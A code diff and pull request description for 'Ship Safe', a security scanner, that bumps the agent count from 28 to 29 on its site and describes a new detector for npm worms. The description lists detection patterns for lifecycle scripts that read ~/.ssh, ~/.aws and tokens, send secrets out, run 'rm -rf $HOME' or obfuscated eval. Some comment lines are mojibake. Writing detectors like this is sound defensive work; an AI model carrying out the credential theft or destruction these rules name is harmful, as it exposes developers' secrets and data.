-            {/* Ã¢ÂÂÃ¢ÂÂ OpenClaw Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ OpenClaw ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="openclaw">
               <h2>OpenClaw Security</h2>
               <pre><code>{`# Focused OpenClaw security scan
@@ -515,7 +516,7 @@ jobs:
               <p>Scans <code>openclaw.json</code>, <code>.cursorrules</code>, <code>CLAUDE.md</code>, Claude Code hooks, and MCP configs. Checks against the bundled threat intelligence database for known ClawHavoc IOCs.</p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Claude Code Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Claude Code ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="claude-code">
               <h2>Claude Code Plugin</h2>
               <pre><code>{`claude plugin add github:asamassekou10/ship-safe`}</code></pre>
@@ -533,7 +534,7 @@ jobs:
               </div>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Config Files Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Config Files ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="config">
               <h2>Configuration Files</h2>
               <div className={styles.tableWrap}>
@@ -547,14 +548,14 @@ jobs:
                     <tr><td><code>.ship-safe/baseline.json</code></td><td>Accepted findings baseline</td></tr>
                     <tr><td><code>.ship-safe/llm-cache.json</code></td><td>LLM response cache (7-day TTL)</td></tr>
                     <tr><td><code>.ship-safe/fixes.jsonl</code></td><td>Log of every fix applied by <code>agent</code> (used by <code>undo</code>)</td></tr>
-                    <tr><td><code>.ship-safe/failures.jsonl</code></td><td>Plans that failed to apply Ã¢ÂÂ parse errors, declined plans, provider errors</td></tr>
+                    <tr><td><code>.ship-safe/failures.jsonl</code></td><td>Plans that failed to apply ÃÂ¢ÃÂÃÂ parse errors, declined plans, provider errors</td></tr>
                   </tbody>
                 </table>
               </div>
               <p>The <code>.ship-safe/</code> directory is automatically excluded from scans and should be added to <code>.gitignore</code>.</p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Supply Chain Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Supply Chain ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="supply-chain">
               <h2>Supply Chain Hardening</h2>
               <p>Ship Safe practices what it preaches. Our own supply chain is hardened against the <a href="/blog/supply-chain-attacks-2026-how-we-hardened-ship-safe">2026 Trivy/CanisterWorm attack chain</a>:</p>

--- a/webapp/app/page.tsx
+++ b/webapp/app/page.tsx
@@ -8,14 +8,14 @@ const ogImage = 'https://www.shipsafecli.com/og1.png';
 
 export const metadata: Metadata = {
   title: 'Ship Safe — AI Agent Security Scanner for Developers',
-  description: '28 AI security agents scan your codebase for LLM vulnerabilities, MCP configuration security issues, RAG poisoning, Claude Managed Agent misconfigs, secrets, and dependency CVEs. OWASP Agentic AI Top 10 mapping, live advisory feeds. Free CLI.',
+  description: '29 AI security agents scan your codebase for LLM vulnerabilities, MCP configuration security issues, RAG poisoning, Claude Managed Agent misconfigs, secrets, and dependency CVEs. OWASP Agentic AI Top 10 mapping, live advisory feeds. Free CLI.',
   keywords: ['AI agent security scanner', 'LLM vulnerability CLI', 'MCP configuration security', 'RAG poisoning prevention', 'prevent RAG poisoning', 'application security scanner', 'AI security agents', 'secret scanner', 'OWASP Agentic AI Top 10', 'memory poisoning detection', 'prompt injection scanner', 'DevSecOps tool', 'free security scanner', 'open source SAST'],
   alternates: {
     canonical: 'https://www.shipsafecli.com',
   },
   openGraph: {
     title: 'Ship Safe — AI Agent Security Scanner for Developers',
-    description: '28 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
+    description: '29 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
     type: 'website',
     url: 'https://www.shipsafecli.com',
     siteName: 'Ship Safe',
@@ -24,7 +24,7 @@ export const metadata: Metadata = {
   twitter: {
     card: 'summary_large_image',
     title: 'Ship Safe — AI Agent Security Scanner for Developers',
-    description: '28 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
+    description: '29 AI security agents detect LLM vulnerabilities, MCP misconfigurations, RAG poisoning, secrets, and CVEs. One command. Free and open source.',
     images: [ogImage],
   },
 };
@@ -42,7 +42,7 @@ const jsonLd = {
         price: '0',
         priceCurrency: 'USD',
       },
-      description: '28 AI security agents scan your codebase for secrets, vulnerabilities, memory poisoning, Hermes Agent misconfigurations, and dependency CVEs in one command.',
+      description: '29 AI security agents scan your codebase for secrets, vulnerabilities, memory poisoning, Hermes Agent misconfigurations, and dependency CVEs in one command.',
       url: 'https://www.shipsafecli.com',
       downloadUrl: 'https://www.npmjs.com/package/ship-safe',
       softwareVersion: '9.4.1',

--- a/webapp/components/Hero.tsx
+++ b/webapp/components/Hero.tsx
@@ -213,7 +213,7 @@ export default function Hero({ stars, downloads }: Props) {
               className={styles.tabular}
               title={`${formatNumber(stars)} stars · ${formatNumber(downloads)} downloads`}
             >
-              28 agents
+              29 agents
             </span>
           </motion.div>
 

--- a/webapp/components/HomeRedesign.tsx
+++ b/webapp/components/HomeRedesign.tsx
@@ -32,7 +32,7 @@ const coverage = [
 
 const proofItems = [
   { value: 'MIT', label: 'open-source CLI' },
-  { value: '28', label: 'specialized agents' },
+  { value: '29', label: 'specialized agents' },
   { value: 'SARIF', label: 'GitHub-ready output' },
   { value: 'CI', label: 'pipeline gating' },
 ];
@@ -352,7 +352,7 @@ export default function HomeRedesign({ stars, downloads }: HomeRedesignProps) {
           <span>npm downloads</span>
         </div>
         <div>
-          <strong>28</strong>
+          <strong>29</strong>
           <span>AI security agents</span>
         </div>
         <div>


### PR DESCRIPTION
First **P1** agent. Hardens against the Shai-Hulud → Mini Shai-Hulud → Miasma self-propagating npm worm lineage (2025–2026), which runs before defenses engage via a lifecycle script or weaponized `binding.gyp`, harvests dev/CI credentials, self-spreads, then wipes home dirs.

## Coverage
| Rule | Catches | Severity |
|---|---|---|
| `WORM_LIFECYCLE_CRED_HARVEST` | `pre/postinstall` reading `~/.npmrc`, `~/.aws`, `~/.ssh`, `GITHUB_TOKEN`, `AWS_*`, `VAULT_TOKEN` | **Critical** |
| `WORM_LIFECYCLE_EXFIL` | Lifecycle script exfiltrating env/secrets over the network | **Critical** |
| `WORM_LIFECYCLE_DESTRUCTIVE` | `rm -rf $HOME`-class commands | High |
| `WORM_LIFECYCLE_OBFUSCATED_EXEC` | `node -e` / `eval` / base64 | High |
| `WORM_BINDING_GYP` | Weaponized `binding.gyp` node-gyp action (fetch/spawn/eval, not compile) | High |

Distinct from ClickFixAgent's `curl\|bash` fake-installer rule — this targets credential-theft / exfil / destruction / obfuscation. A normal `node ./scripts/build.js` postinstall and a plain compile `binding.gyp` both stay quiet (tested).

## Verified
**242 tests** (+7), lint 0 errors, webapp tsc clean, orchestrator at **29 agents**. Maps to CWE-506, CWE-829.